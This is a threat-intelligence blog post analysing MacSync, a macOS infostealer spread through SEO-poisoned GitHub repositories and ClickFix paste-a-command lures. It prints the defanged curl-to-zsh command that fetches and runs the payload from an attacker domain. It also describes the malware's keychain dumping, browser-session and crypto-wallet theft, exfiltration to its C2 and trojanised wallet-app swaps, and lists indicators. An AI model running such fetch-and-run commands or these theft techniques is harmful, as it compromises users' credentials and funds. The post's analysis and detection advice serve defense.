Skip to content

Emerging Threats · Featured · Malware Analysis

MacSync: when the victim types the attack chain

· u375 · 15 min read

No exploit. No attachment. No phishing email. In this campaign the threat actor needs the victim to do exactly one thing: copy a command from an installation guide and paste it into the macOS Terminal. In the summer of 2026 our SOC intercepted that moment three times, on the same corporate endpoint, and blocked it three times. The target: a developer’s Mac. The payload: MacSync, an infostealer sold as Malware-as-a-Service and built for the Apple ecosystem.

This article has two halves. The first sets out the general mechanism: why the SEO Poisoning plus ClickFix combination works, why macOS is now a first-class target, and why a Malware-as-a-Service payload breaks classic attribution. The second is the technical evidence from the case our SOC handled: the reconstructed chain, the intercepted command, the code recovered during controlled detonation, and the MITRE ATT&CK and indicator detail.

Five-stage attack chain: fraudulent GitHub repo, SEO Poisoning, redirect to external site, ClickFix, payload delivery
The end-to-end chain. No stage exploits a software flaw, the only technical control in the path is behavioural detection at the endpoint.
01 Chapter 01

Part one: the mechanism

▸ 1.1  A paradigm shift, not a new exploit

For years the mental model of endpoint compromise assumed a technical flaw somewhere: an unpatched CVE, a malicious macro, an attachment that drops a loader. This campaign has none of that. It never touches a vulnerability. It substitutes the exploit with the user, and it does so by weaponising two ordinary behaviours: trusting a top search result, and pasting a command from a guide into a terminal.

That substitution is what makes the technique dangerous across the board. Perimeter maturity, patch cadence, attachment sandboxing, none of it is in the path. The only controls left standing are behavioural detection at the endpoint and the user’s own judgement, and the whole campaign is engineered to defeat the second one.

▸ 1.2  macOS is no longer the quiet platform

The assumption that macOS is a low-risk environment is now an operational asset for the threat actor, not a fact for the defender. The proliferation of infostealers written specifically for macOS and sold under a MaaS model, MacSync among them, confirms that the Apple ecosystem has become an established target for financially motivated actors.

The target profile explains the interest. Developers, engineers and system administrators run macOS in large numbers, they treat the command line as a daily tool, they pull software from online repositories without a second thought, and they routinely hold exactly what a stealer wants: credentials to corporate infrastructure, cloud tokens, SSH keys, browser sessions and, in many cases, cryptocurrency wallets. The very habits that make these profiles productive are the habits ClickFix exploits.

▸ 1.3  SEO Poisoning: acquiring the victim

SEO Poisoning is the deliberate manipulation of the ranking factors search engines use, applied to push malicious content into the top results for chosen queries. The methods are the same ones legitimate SEO uses, turned to a fraudulent end.

Keyword-targeted content builds the malicious page around high-volume queries, typically the name of a popular tool or a commonly searched function. Artificial backlink networks inflate the authority the ranking algorithm perceives. And, decisively here, the campaign hosts its lure on GitHub: a platform with high domain reputation in the eyes of search engines, which speeds high-ranking placement, and high intrinsic trust in the eyes of a technical user, who reads a github.com URL as safe by default.

The result reframes the entire delivery. The victim does not receive a phishing email or click a link someone sent them. They run a search, get a result that looks relevant and legitimate, and follow it, on their own initiative. The suspicion threshold sits far lower than it would for an inbound message, and awareness programmes built only around email phishing never engage.

▸ 1.4  ClickFix: converting the victim into the delivery vector

ClickFix exploits a different psychological lever than classic phishing. It does not ask the user to click a malicious link. It asks them to actively perform a technical action, copying and running a terminal command, presented as a legitimate step in installing, updating or configuring software.

Four factors make it work. Familiarity: for developers and sysadmins, running commands copied from guides and documentation is routine, not anomalous. Absence of the usual phishing tells: no attachment to open, no credential form to fill, no obviously fake domain, only a command that looks generic and harmless. Delegated trust: the user extends the trust they already granted the repository or the site to the command itself, and skips the scrutiny they would apply to an unknown script. And an implicit bypass of perimeter controls: because the action is performed by hand inside a legitimate context, the user’s own terminal, it sidesteps controls built to block malicious attachments and links, leaving endpoint behavioural detection as the only technical line of defence.

Combined, SEO Poisoning and ClickFix remove the threat actor’s need for any technical vulnerability in the target. The whole vector rests on the victim’s voluntary, if deceptively induced, interaction with content they found themselves. That is what makes this class of threat relevant to any organisation, regardless of how mature its perimeter is.

02 Chapter 02

Part two: the technical evidence

▸ 2.1  Detection and chain reconstruction

During the summer of 2026 our SOC handled an alert on a corporate macOS laptop used by a technical profile (an engineer/developer) at a client organisation: an attempted execution of a malicious command. Our analysts reconstructed the full sequence, and it matched the mechanism above end to end. The user set out to install what they believed was legitimate software, reached a fraudulent GitHub repository ranked into the search results by SEO Poisoning, followed the fake installation guide it contained, and was redirected to an external site outside GitHub carrying a command line to run in the macOS Terminal.

A telling detail of how convincing the fake process was: the user ran the malicious command three separate times, treating the block as a step that had to succeed to finish the install, not as a warning. All three attempts were blocked before the download could complete.

▸ 2.2  The intercepted command

The command blocked on the endpoint, shown defanged to prevent accidental execution:

curl -kfsSL hxxp://robertjonesrealty[.]com/curl/720e1e04c2690ac14874d54823354d6bd06336b23e8458debaffeb2b18f5be6a | zsh

Reading the flags is instructive, because they were chosen to make the request quiet and robust rather than to look malicious. -s silences progress and error output, -f makes curl fail quietly on server errors instead of writing an error page to disk, -S restores error messages when -s is set, -L follows redirects (so the staging domain can hand off to another host), and -k disables TLS certificate verification, letting the download succeed against a host with a self-signed or invalid certificate. The path component is a 64-character hex string, consistent with a per-victim or per-campaign identifier used to gate and track delivery. The output is piped straight into zsh, the default shell on modern macOS, so nothing is ever written to disk as a file the user would see: the script executes in memory, in the user’s own session.

▸ 2.3  Inside MacSync: the recovered code

To establish what would have happened had the command not been blocked, our team detonated it in a controlled sandbox and recovered the malware’s own source. The flow it revealed, and the collection routines it runs, are summarised below, then walked through with the recovered code.

MacSync execution flow: curl to shell, base64 loader, OSA/AppleScript, killall Terminal, stage and exfil; harvest targets are browser artefacts, keychain, system recon, local wallets, Ledger and Trezor
MacSync execution flow reconstructed in the sandbox, and the collection routines it runs. Function names are the malware’s own.

▸ 2.3.1  Stage one: the loader

The first script fetched by the curl call is base64-encoded and gzip-compressed, a wrapper that defeats trivial string inspection and content filters. It decodes and executes itself in memory with eval, so no file is dropped to disk.

Loader script: zsh, base64 -D piped to gunzip, then eval of the decoded payload variable
Stage-1 loader: base64 -D | gunzip into a variable, then eval. In-memory execution, no file on disk.

▸ 2.3.2  Stage two: the OSA core and anti-detection

The decoded payload downloads and runs an OSA (Open Scripting Application) / AppleScript component. AppleScript is a native macOS automation layer, which lets the malware drive the operating system and applications through sanctioned interfaces rather than exotic API calls, reducing how anomalous it looks. Before harvesting anything, it closes every open Terminal window to lower the chance the user notices unusual output.

AppleScript snippet: do shell script killall Terminal inside a try block
Anti-detection: killall Terminal before collection begins.

▸ 2.3.3  Collection routines

The OSA script carries a named routine for each data source. SafeSQLiteCopy copies browser databases together with their -wal and -shm journals, so live cookies and session tokens come out intact rather than locked or partial.

SafeSQLiteCopy routine copying SQLite databases with sqlite3 timeout and cp of -wal and -shm files
SafeSQLiteCopy: browser DB theft with WAL/SHM handling to capture live sessions.

grabPlugins walks installed browser extensions and lifts their IndexedDB stores, and ChromiumWallets matches those extensions against a hardcoded list of crypto-wallet extension IDs, so wallet plugins are singled out for collection.

grabPlugins routine iterating extension folders and copying matching plugin IndexedDB data
grabPlugins: iterate extensions, copy IndexedDB for matches.
ChromiumWallets routine with a hardcoded list of crypto-wallet browser extension IDs
ChromiumWallets: hardcoded crypto-wallet extension IDs targeted for theft.

grabAllStorageKeys dumps the macOS keychain through helper files staged at /tmp/.kgrab.sh and /tmp/.kpwd, decoding a pre-built shell script from base64 to avoid quote-escaping.

grabAllStorageKeys routine writing a keychain dump helper to /tmp/.kgrab.sh and a password to /tmp/.kpwd
grabAllStorageKeys: keychain dump via /tmp/.kgrab.sh and /tmp/.kpwd.

Processes records system_profiler, ps ax and lsappinfo output for host fingerprinting, while DesktopWallets and Filegrabber pull local wallet folders and targeted files wholesale.

Processes, DesktopWallets and Filegrabber routines running lsappinfo, ps ax and grabbing wallet folders
Processes, DesktopWallets, Filegrabber: host recon and wholesale wallet-folder collection.

▸ 2.3.4  Staging, single-run lock and version tag

Collected data is written to a randomised /tmp/sync<random> working folder, guarded by a lock file (/tmp/macsync_<token>.lock) so the stealer runs once per host.

AppleScript setting writemind to /tmp/sync plus a random number and a lock file at /tmp/macsync_token.lock
Working folder /tmp/sync<random> and single-run lock /tmp/macsync_<token>.lock.

The malware stamps its own build into the collected set, an operator convenience that betrays a maintained, versioned MaaS product rather than a one-off. It also runs system_profiler for software, hardware and display details.

Routine writing MacSync Stealer, Build Tag New build 2, Version 1.1.2_release x64_86 and ARM, plus system_profiler output
Self-reported fingerprint: MacSync Stealer · Build Tag "New build 2" · 1.1.2_release (x64_86 & ARM).

▸ 2.3.5  Exfiltration

A daemon_function uploads the archive in chunks to the C2, authenticated with a hardcoded api-key header and a spoofed macOS User-Agent, to a /dynamic endpoint keyed by the same 64-character token seen in the initial URL.

daemon_function with domain, token, api_key variables and a chunked curl upload to a /dynamic endpoint
daemon_function: chunked upload to /dynamic?txd=<token> with an api-key header and spoofed User-Agent.

▸ 2.3.6  The wallet endgame

The final routine is the most revealing about intent. If Ledger Live or Trezor Suite, the companion desktop apps for the two most common hardware wallets, are installed, MacSync downloads a trojanised build from the C2 and swaps out the genuine application bundle, replacing app.asar and Info.plist inside /Applications. This is persistence aimed squarely at the money: rather than hooking a system service, the threat actor plants itself inside the applications the victim uses to manage crypto assets, positioned to intercept future wallet interactions. It is compromise-for-theft dressed as persistence.

Routine building LEDGERURL to a trojanised Ledger Live build and replacing app.asar and Info.plist in the installed app
Ledger Live swap: trojanised build pulled from the C2, app.asar and Info.plist replaced.
Equivalent routine for Trezor Suite, downloading a trojanised build and replacing the installed app
Trezor Suite swap: identical technique against the second hardware-wallet app.

▸ 2.4  Attribution: a cluster, not an actor

Our Threat Intelligence team tracks this activity as the Pulsar MacSync cluster, one of the 287 adversary groups and offensive tools currently in our CTI scope. The word cluster is deliberate. It groups campaigns that share TTPs, distribution infrastructure and final payload, for correlation and detection. It does not name a criminal group, and it is not meant to. The elements gathered in this case do not support attribution to a single actor, and are not intended to.

MaaS attribution model: one developer sells the same MacSync build to multiple unrelated affiliates who run their own campaigns and share or resell C2 infrastructure
Why attribution breaks under Malware-as-a-Service: development and operation are decoupled, the same build reaches unrelated affiliates.

The reason is structural, not a shortfall of analysis. Classic attribution correlates C2 infrastructure, distinctive TTPs, code artefacts and, where available, geopolitical or motivational signals, and it implicitly assumes a stable link between an actor and its tools, that whoever builds the malware also operates it. The MaaS model severs that link. Development sits with one actor or small team, responsible for maintaining the stealer, evolving it and keeping it evasive, and selling it as a product or on an affiliate revenue-share. Operation, building campaigns, choosing distribution vectors, running the first-layer infrastructure (repositories, redirect sites, staging domains), is delegated to many affiliates or customers who may have no relationship to one another. And the C2 infrastructure is shared, reconfigured and resold between affiliates over time, dissolving the anchor attribution traditionally leans on.

So two campaigns delivering the same MacSync build, with the same technical capabilities and even similar distribution TTPs, can be run by two entirely separate groups whose only connection is having bought the same product on the same market. Attributing a MacSync campaign to a single intrusion set would confuse the manufacturer of a tool with whoever wields it, and would point response and defensive priorities at a target that does not exist.

The practical consequence drives the defensive posture. Once attribution to an actor loses operational meaning, detection has to anchor on the TTPs and behavioural indicators shared across campaigns using the same malware or the same distribution technique, whoever runs them. Static indicators (domains, hashes) rotate in days in a MaaS economy; the behavioural pattern (curl piped to a shell from a fresh domain, Terminal processes killed, archives staged in /tmp, trojanised wallet apps) persists across affiliates.

Nothing in the case points to targeting of this client, this sector or this country. SEO Poisoning on generic queries is a net, not a spear. That does not shrink the threat, it widens it: any organisation with macOS endpoints in technical hands is inside the exposure surface.

▸ 2.5  MITRE ATT&CK mapping

TacticTechniqueID
Resource DevelopmentStage Capabilities: SEO PoisoningT1608.006
ExecutionUser Execution: Malicious Copy and PasteT1204.004
ExecutionCommand and Scripting Interpreter: Unix ShellT1059.004
ExecutionCommand and Scripting Interpreter: AppleScriptT1059.002
Command and ControlIngress Tool TransferT1105
Defense EvasionDeobfuscate/Decode Files or Information (base64 + gzip)T1140
Defense EvasionImpair Defenses / kill Terminal processesT1562
Credential AccessCredentials from Password Stores: KeychainT1555.001
Credential AccessCredentials from Web BrowsersT1555.003
DiscoverySystem Information Discovery (system_profiler)T1082
DiscoveryProcess DiscoveryT1057
CollectionData from Local SystemT1005
CollectionArchive Collected DataT1560
ExfiltrationExfiltration Over C2 ChannelT1041
PersistenceCompromise Host Software Binary (trojanised Ledger/Trezor)T1554

▸ 2.6  Indicators of Compromise

Indicator (defanged)TypeRole
robertjonesrealty[.]comDomainStaging + C2: payload delivery (/curl/, /ledger/, /trezor/) and exfil endpoint (/dynamic)
ohdentalimplants[.]comDomainStaging domain serving the second-stage payload
/tmp/sync<random>/PathRandomised collection folder
/tmp/osalogging.zipPathArchive of collected data prepared for exfiltration
/tmp/macsync_<token>.lockPathSingle-run lock file (token = 64-char campaign id)
/tmp/.kgrab.sh · /tmp/.kpwdPathKeychain-dump helper and password file
api-key: 5190ef1733183a0dc63fb623357f56d6HTTP headerExfiltration authentication (campaign/affiliate key)
MacSync Stealer · 1.1.2_release (x64_86 & ARM) · Build Tag "New build 2"StringMalware self-reported version fingerprint

Indicators are already integrated into the Fortgale Intelligence Feed for preventive blocking across our client base, and will be updated as the Pulsar MacSync infrastructure evolves.

▸ 2.7  Post-incident verification and outcome

After the analysis, our team ran thorough checks on the affected host to rule out additional attack vectors or alternative access paths used in parallel, then extended verification across the client’s systems and infrastructure. No suspicious activity, no indicators of compromise. The event stayed confined to a compromise attempt blocked at its first stage: no host compromise, no final payload execution, no data exfiltration.

03 Chapter 03

What to take from this

The favourable outcome is not the point. The value of the case is that it was a near-miss: a technically well-orchestrated attempt that came within one blocked command of running a stealer on a corporate endpoint, and was stopped not by a mistake on the threat actor’s side but by the defensive controls in place. Without behavioural detection at the endpoint the outcome would, in all likelihood, have been the download of MacSync and the exfiltration of credentials and wallet data.

Immediate. Block the indicators above. Alert on shell processes spawned from curl | sh / curl | zsh patterns on macOS endpoints, and on mass termination of Terminal processes. Confirm endpoint coverage actually extends to the Mac fleet: the perception of macOS as low-risk is now working for the threat actor.

Short term. Take awareness content beyond email phishing. Developers and sysadmins need to see ClickFix specifically, because their command-line routine is exactly what the technique turns against them. Review software installation paths for technical staff: approved repositories, package managers with signature verification.

Structural. Move detection investment from static indicators towards behavioural analytics at the endpoint and identity level. In a MaaS landscape the campaign changes weekly; the TTPs are the stable surface, and the human remains the most exposed link regardless of technical skill, precisely because familiarity with the command line is what ClickFix exploits.

A cyber attack is not something. It is someone. In this campaign, someone who never had to touch the target: the victim typed the attack chain for them, three times, and it was blocked three times, because the defence was watching behaviour, not a list of known threats.

Knowing the adversary is the first act of defence. Stopping them in time is the second.

Talk to our analysts about ClickFix detection on macOS fleets, or request a threat briefing on the Pulsar MacSync cluster.

Speak with our analysts Blog home